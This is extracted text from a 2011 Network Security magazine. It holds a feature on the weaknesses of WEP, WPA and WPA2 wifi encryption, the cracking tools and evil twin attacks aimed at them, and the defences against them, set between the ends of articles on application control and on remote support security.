FEATURE

14
Network Security November 2011
Especially in large corporations, its
highly unlikely that an administrator
can say, with absolute certainty and for
all members of staff, which applications
are legitimate or even business-critical
for which employee. A responsible,
restricted use of social media and pri-
vate websites is the ideal today. Putting
it bluntly, one administrator even said:
Ill start blocking arbitrary applications
when I want to lose my job. With new
options available to them, administrators
can closely observe and optimise the net-
work traffic. The following regulations
are conceivable:
Access to job portals is only granted to
the HR department.
Private Internet surfing is allowed
outside core working hours and in the
lunch break.
Sales and marketing are given unre-
stricted access to Facebook and other
social networks.
If clear internal guidelines exist and
state that, for example, Skype may not
be used, then the most successful option
is not to block these applications, but to
curb them. These applications become
unbearably slow with less than 10 Kb/s
bandwidth and users are practically para-
lysed so they will restrict their usage
voluntarily. Otherwise the focus should
be placed on the high availability of
business-critical applications, for example
the Enterprise Resource Planning (ERP)
system. These should be given high prior-
ity and perhaps routed from the outset to
better and more reliable connections.
This kind of WAN optimisation will
be awarded a new importance with the
cloud computing trend. What is the
point in renting high-performance cloud
resources or Software as a Service (SaaS)
if the access to these is slowed down by
YouTube videos and Facebook updates?
About the author
Dr Klaus Gheri is VP product management
Europe at Barracuda Networks. Prior to the
acquisition of Austria-based Phion AG by
Barracuda Networks in late 2009, he served
as Phions co-founder and CTO, responsible
for product and technology strategy as well
as strategic business relationships. After an
international research career in quantum
communication he left academia to start
Phion. Gheri has been a key player in the
architectural design and development of the
Barracuda NG Firewall (formerly Phion
Netfence enterprise firewall) product line.
He has more than 10 years of experience
working in the security arena and has
spoken at many security events worldwide,
including Infosecurity Europe. Gheri holds
a PhD in theoretical physics from the
University of Auckland, New Zealand.
Figure 3: Next-generation firewall management with application and user detection.
Cracking wireless
networks
Integrity in question
In 2004, the integrity of the WEP pass-
word system was called into question
after the Aircrack wifi password-cracking
suite was released. The open source
suite now known as Aircrack-ng and
updated to perform attacks on the WPA/
WPA2 wifi password systems consisted
of a number of wireless auditing utilities:
Airodump a 802.11 packet capture
program.
Aireplay a 802.11 packet injection
program.
Aircrack a static WEP and WPA-
PSK key cracker.
Airdecap which decrypts WEP/
WPA capture files.
Because the amount of time it takes
to hack an encrypted wireless network is
dependent on the amount of traffic that
Steve Gold
Steve Gold, freelance journalist

The security of wifi connections has been in and out of the news over the past
few years as the integrity of the wifi encryption process has been progressively
eroded. Wifi encryption is normally driven by the use of three flavours of pass-
words/passphrases Wired Equivalent Privacy (WEP), Wifi Protected Access
(WPA) and WPA2 which use different methodologies to ensure (to differing
degrees) the integrity of the wifi IP-based communications path. But all have
come under attack, with tools available to intercept and crack authentication.
Does this mean that wifi should now be considered insecure?
FEATURE
November 2011 Network Security
15
the cracking software has access to, the
second module of Aircrack Aireplay
is viewed as the most useful program of
the four, as it allows the wireless hacker
to increase the network traffic and so
speed up the hacking process.
The third and fourth elements of the
suite Aircrack and Airdecap were (and
still are) useful to crackers because they
work for both WEP and WPA encryption,
although back in 2004 the processing
power available at that time made the
cracking of a WPA password a lengthy
process normally taking several weeks,
even where multi-core processing power
was used. This contrasted with a typical
cracking time for WEP (in 2004) of 20
minutes or so a time-frame that has been
reduced to around 30 seconds using com-
mercial software from Elcomsoft and oth-
ers, as well as open source/freeware apps/
suites such as Aircrack.
Marlinspike claimed that his
systems could crack vulnerable
WPA passwords in around 20
minutes
The revelations about WEP insecurity
meant that, since 2005, most experts have
advised against the use of WEP-based
password security except where absolutely
necessary although interestingly enough
many wireless audio streaming systems,
notably Logitechs Squeezeserver and
Squeezebox series, advise the use of WEP
owing to its low overhead in terms of data
bandwidth used.
Cracking WPA
It took until December 2009 before
leading security researcher Moxie
Marlinspike who has since gone on to
develop a number of smartphone and
tablet computing crypto applications
for the Android platform launched
the WPAcracker.com website.
1
Using
a parallel processing set of servers,
Marlinspike claimed that his systems
could crack vulnerable WPA passwords
in around 20 minutes, a process that
would have taken a dual-core PC around
120 hours using suitable software at the
time. The cloud-based service which
costs $17.00 a time reportedly uses a
400-node cluster of computers to run
through around 130 million WPA pass-
word combinations in 20 minutes.
To use the service, Internet users upload a
copy of the handshake file that occurs when
a wifi device starts negotiating a link with a
wifi access point downloaded off-air using
AirCracks Airodump module or an open
source utility such as Wireshark. Although
Wireshark is generally best known as a
packet sniffer and analyser, widely used for
network troubleshooting, analysis, software
and communications protocol development
its considerable evolution, since it was first
launched as Ethereal, makes it a popular
wifi analysis tool.
The evolution of WPAcracker.com
was notable in wireless cracking terms
as according to Marlinspike although
rainbow tables can be used to brute-force
crack a WPA password, the process is
truly brute force in nature because each
cracking project is unique. As Marlinspike
observes: You have to build a unique set
of rainbow tables for each network that
you would potentially like to audit.
A rainbow table is essentially a pre-
computed table for reversing crypto-
graphic hash functions, typically used
for cracking password hashes. Tables are
usually used for recovering the plain-text
password up to a certain length consist-
ing of a limited set of characters.
Marlinspikes WPAcracker.com site
though ground-breaking at the time
has been superseded by a number
of other WPA cracking developments,
most notably Elcomsofts aptly-named
Wireless Security Auditor (WSA),
which is available in standard and pro-
fessional versions. Like many of the
Russian-based password recovery spe-
cialists applications, WSA is designed
to harness the complete processing
power of a host computer including
tapping the power of PC graphics cards
to intelligently brute-force decrypt
a password system, in this case WPA/
WPA2 passphrases.
Elcomsofts WSA is also notable as
there is a trial version available from
Moxie Marlinspike.
Wireless Security Auditor from Elcomsoft.
FEATURE
16
Network Security November 2011
the companys website that like the
paid-for editions supports dictionary
attacks with an advanced variation facil-
ity that uses standard tcpdump logs. Put
simply, the software allows even novices
to intelligently crack WPA and WPA2
passphrases. Ironically, cracked versions
of WSA are widely available on various
pirate and warez forums, although many
versions of the cracked software are
infected with malware.
The development of WPAcracker.com
and Elcomsoft WSA does not mean that
all WPA passphrases are crackable as, gen-
erally speaking, the longer a passphrase is,
the more difficult (in terms of the time
taken) it is to crack. WPAs (and WPA2s)
great strength is that it uses a technol-
ogy known as Temporal Key Integrity
Protocol (TKIP), which replaces WEPs
40-bit or 128-bit encryption system with
a 128-bit per-packet key. In use, TKIP
dynamically generates a new key for each
packet, as well as performing a message
integrity check.
How easy is it to crack a
WPA2 passphrase?
Until September 2010, when Elcomsoft
released a major upgrade to its WSA
software, most experts advised that
WPA2 was a sufficiently strong password
system to make it uncrackable. All of
that changed overnight when WSA was
refreshed with the addition of enhanced
WPA2 password brute force cracking,
which means that, with the professional
version, crackers can use a computer
with up to 32 CPUs and 8 GPUs to
crack wifi encryption using a brute force
attack. Review tests of Elcomsofts WSA
software have shown the application can
brute force crack as many as 103,000
WPA2 passwords per second which
equates to more than six million pass-
words a minute on an HD5390 graph-
ics card-equipped PC.
According to Peter Wood, CEO
of pen-testing specialist First Base
Technologies, Elcomsofts software
essentially means that the integrity of a
wifi connection cannot be trusted and,
while he recommends that WPA2 pass-
phrases of 20 characters or more can be
used in a domestic wifi environment, he
advises against the use of wifi in a busi-
ness setting. If a wireline connection is
not available as is the case in many
offices then he recommends the use of
20+ character WPA2 passphrases (with
mixed upper and lower characters) and
a Radius-based VPN system to adopt
a belt-and-braces approach to wireless
security.
The evil twin hacking
methodology involves setting
up a rogue wifi access point
with the same Service Set
Identifier (SSID) as the adjacent
legitimate station and waiting
for users to log in
Wood, who is also a member of the
ISACA Security Advisory Group, says:
The problem with most business wifi
deployments is that admins use pass-
phrases that are a lot shorter than 20
characters, even though a 20 character,
or more, passphrase can be a simple
phrase that means something to the user
for example, OurProductsAreBetter-
ThanThoseFromACMELimited or
something similar.
This, he says, would be almost impos-
sible for a cracker to guess.
Private Wifi by Private Communications Corp.
Peter Wood, First Base Technologies.
FEATURE
November 2011 Network Security
17
Say hello to the evil
twin
Wood also cautions against compla-
cency, even if an organisation uses a
20-plus character WPA2 passphrase,
as hackers have been spotted using a
technique known as an evil twin wifi
access point attack for several years.
The evil twin hacking methodol-
ogy involves setting up a rogue wifi
access point with the same Service Set
Identifier (SSID) as the adjacent legiti-
mate station and waiting for users to
log in automatically.
Hackers have modified the evil twin
methodology for use on cellular net-
works. At the DefCon security confer-
ence in Las Vegas in August 2010, a
rogue GSM base station was used to
hoover up mobile phone access cre-
dentials the International Mobile
Subscriber Identity (IMSI) electronic
serial number of the SIM card inserted
into the hardware, and the International
Mobile Equipment Identity (IMEI) of
the device hardware.
2
The security of wifi
connections if they must be
used needs to be augmented
through the use of Radius or
similar advanced authentication
systems
Unfortunately for the wifi indus-
try and its users, wifi systems do not
employ standards-based unique identi-
fiers such as the IMSI/IMEI technol-
ogy seen on cellular networks, meaning
that if a rogue wifi access point with
the same SSID as a legitimate access
point is located nearby, users devices
will typically log themselves into the
evil twin station. As well as introducing
all manner of IP and VoIP eavesdrop-
ping possibilities using a man-in-the-
middle approach, the wifi evil twin also
means that the authentication hand-
shake right down to the WEP, WPA
and WPA2 passphrases and other user
credentials can be harvested by the
hackers.
Wood says that is another reason why
the security of wifi connections if they
must be used needs to be augmented
through the use of Radius or similar
advanced authentication systems, but
notes that the evil twin attack methodol-
ogy is relatively simple in technological
terms, yet reaps enormous benefits for
cybercriminals.
Encrypted wifi made
easy
While the underlying insecurity of wifi
network standards especially pub-
lic access networks is likely to be a
thorn in the side of the IT industry for
some time to come, a US-based com-
pany called Private Communications
Corp (PCC) has a subscription security
service that creates a 128-bit Secure
Sockets Layer (SSL) VPN between the
mobile computer (Windows XP, Vista
or 7, or Apple Mac OS 10.5 or later)
and its servers. Called Private Wifi, the
$9.95 a month ($89.95 a year) service
transparently creates an encrypted tun-
nel between the wifi-enabled computer
and the Sherman, Connecticut-based
firms servers and, according to Kent
Lawson, PCCs CEO, uses a client appli-
cation to encrypt all data going in and
out of a computer across a wifi link into
the Internet.
3
Private Wifi, he says, activates auto-
matically in the background of any com-
puter, similar to how anti-virus and anti-
malware applications operate. As well as
encrypting the TCP/IP transmissions,
Lawson explains that the secure connec-
tion also masks users IP addresses, add-
ing an extra layer of privacy.
If paying an ongoing subscription for
encrypted wifi access is inappropriate,
then another option may be to force an
HTTPS connection. This wont solve
the underlying security issues associ-
ated with wifi usage, but it will make
the overlay web sessions more secure.
HTTPS uses the SSL/TLS protocol to
provide encrypted communications
and secure identification across an
underlying IP-based connection. While
widely used for financial transactions,
HTTPS has a high data overhead, so
the protocol is normally only used
by web hosts when user credentials
and allied private information are
exchanged.
In September 2010, the Electronic
Frontier Foundation and The TOR
Project (a web anonymity project team)
teamed up to develop a Mozilla Firefox
add-on that forces an HTTPS connec-
tion whenever the facility is available
on a website being accessed. Known as
HTTPS Everywhere, the Firefox add-in
is free to download and use, and rewrites
all regular HTTP requests to all websites
using the HTTPS protocol. The add-in
has a configurable rule set, meaning that
users can modify its behaviour to meet
their personal needs.
Finally, there are several wifi analy-
sis and sniffer applications available
for Android-based devices though
not generally on iOS as Apple report-
edly takes a dim view of these apps,
reasoning they can be used by hackers
as well as network auditors. However,
Apple has approved SubnetInsight from
BluesWine.
4
This wifi analysis utility
allows iPhone and iPad users to scan,
audit and manage their wifi networks,
as well as interrogating all the devices
connected behind the router to see if
anything unusual is going on.
About the author
Steve Gold has been a business journal-
ist and technology writer for 26 years. A
qualified accountant and former audi-
tor, he has specialised in IT security,
business matters, the Internet and com-
munications for most of that time. He
is technical editor of Infosecurity and
lectures regularly on criminal psychology
and cybercrime.
References
1. Kandek, Wolfgang. New cloud-
based wireless password cracker.
Dark Reading, 9 Dec 2009. Accessed
Nov 2011. <http://www.darkreading.
com/blog/227700972/new-cloud-
based-wireless-password-cracker.
html>.
2. DefCon 2010 hack of cellular
networks shows evil twin meth-
odology. InfoSecurity, 6 Aug
2010. Accessed Nov 2011. <http://
www.infosecurity-magazine.com/
view/11564/defcon-2010-hack-of-
cellular-networks-shows-evil-twin-
methodology>.
FEATURE
18
Network Security November 2011
Whos in control:
a six-step strategy
for secure IT
Hackers are usually one step ahead of
IT professionals, and theyve been char-
acteristically swift in taking advantage
of insecure remote support technol-
ogy products, many of which are like
Swiss cheese full of holes. Indeed,
a report from Verizon that examined
the attack pathways of more than 700
data breaches caused by hackers in
recent times, identified several areas of
concern, of which the most significant
came from remote control and remote
access tools.
According to the report, as many as
71% of all hacking attacks are conduct-
ed through remote access and desktop
services pathways, painting a worrying
picture for CIOs, CSOs and IT help-
desk managers. In the face of such a
threat to data security, IT professionals
as well as end users need to ask tough
questions about who is accessing their
systems (and why), what exactly is being
accessed, and what is happening with
the information at their disposal.
One way IT can mitigate this threat
is by adopting a secure, centralised
remote support solution and then
blocking network access for all other
unapproved remote access and support
software. The following six tips offer
guidance for support organisations
to ensure that their remote support
solution offers the highest levels of
security.
SaaS vs on-premise
Clearly, one of the most important fac-
tors in ensuring remote support secu-
rity is identifying who is in control
of the data. There are many choices
of remote support technologies, but
they mainly fall into two categories:
Software as a Service (SaaS) and on-
premise.
By design, any data that is accessed
through a SaaS remote support tool is
automatically passed through a third-
party server, which means the third-
party provider or anyone who breaches
that vendor, has the ability to access
the data and in some cases credentials.
That said, SaaS is a perfect option for
many technologies and applications, as
it offers a number of benefits. However,
because remote support tools gener-
ally allow access into every employees
devices (desktops, laptops, mobile
devices, etc) and a majority of com-
pany networked systems and servers,
the obvious dangers of passing the data
through a third party become clear.
Essentially, when you put your remote
support system in the cloud, youre
agreeing to put all of your companys
data and systems in the cloud.
With an on-premise model
for remote support, all of the
data accessed during a remote
support session remains behind
the companys own firewall,
keeping the company in control
With an on-premise model for
remote support, all of the data accessed
during a remote support session, along
with a formal audit trail of the support
representatives actions, remains behind
the companys own firewall, keeping
the company in control. This is clearly
a significant benefit for companies that
Stuart Facey
3. Smollinger, Matt. Private Wifi
Reviewed. SmallCloudBuilder, 17 Mar
2011. Accessed Nov 2011. <http://
www.smallcloudbuilder.com/apps/
reviews/293-private-wifi-reviewed>.
4. SubnetInsight. Apple iTunes.
Accessed Nov 2011. <http://itunes.
apple.com/us/app/subnetinsight-
scan-manage/id385495647?mt=8>.
Resources
1. Arbaugh, William. An Inductive
Chosen Plaintext Attack against
WEP/WEP2. University of
Maryland, May 2001. Accessed
Nov 2011. <http://www.cs.umd.
edu/~waa/attack/v3dcmnt.htm>.
2. Wireless adoption leaps ahead,
advanced encryption gains ground
in the post-WEP era. RSA, 14
Jun 2007. Accessed Nov 2011.
<http://www.rsa.com/press_release.
aspx?id=8451>.
3. How to: Aircrack-NG (Simple
Guide). Ubuntu Forums. Accessed
Nov 2011. <http://ubuntuforums.
org/showthread.php?t=528276>.
Stuart Facey, Bomgar
As more and more organisations encourage flexible and remote working policies
that allow employees to work outside the office, the complexity surrounding
remote access and support mechanisms for the IT helpdesk has also increased.
There is a growing and unregulated market for solutions that can fix IT issues
quickly and efficiently no matter where workers are located: however, as with
many solutions, remote support and access products have their own inherent
security risks that should not be underestimated.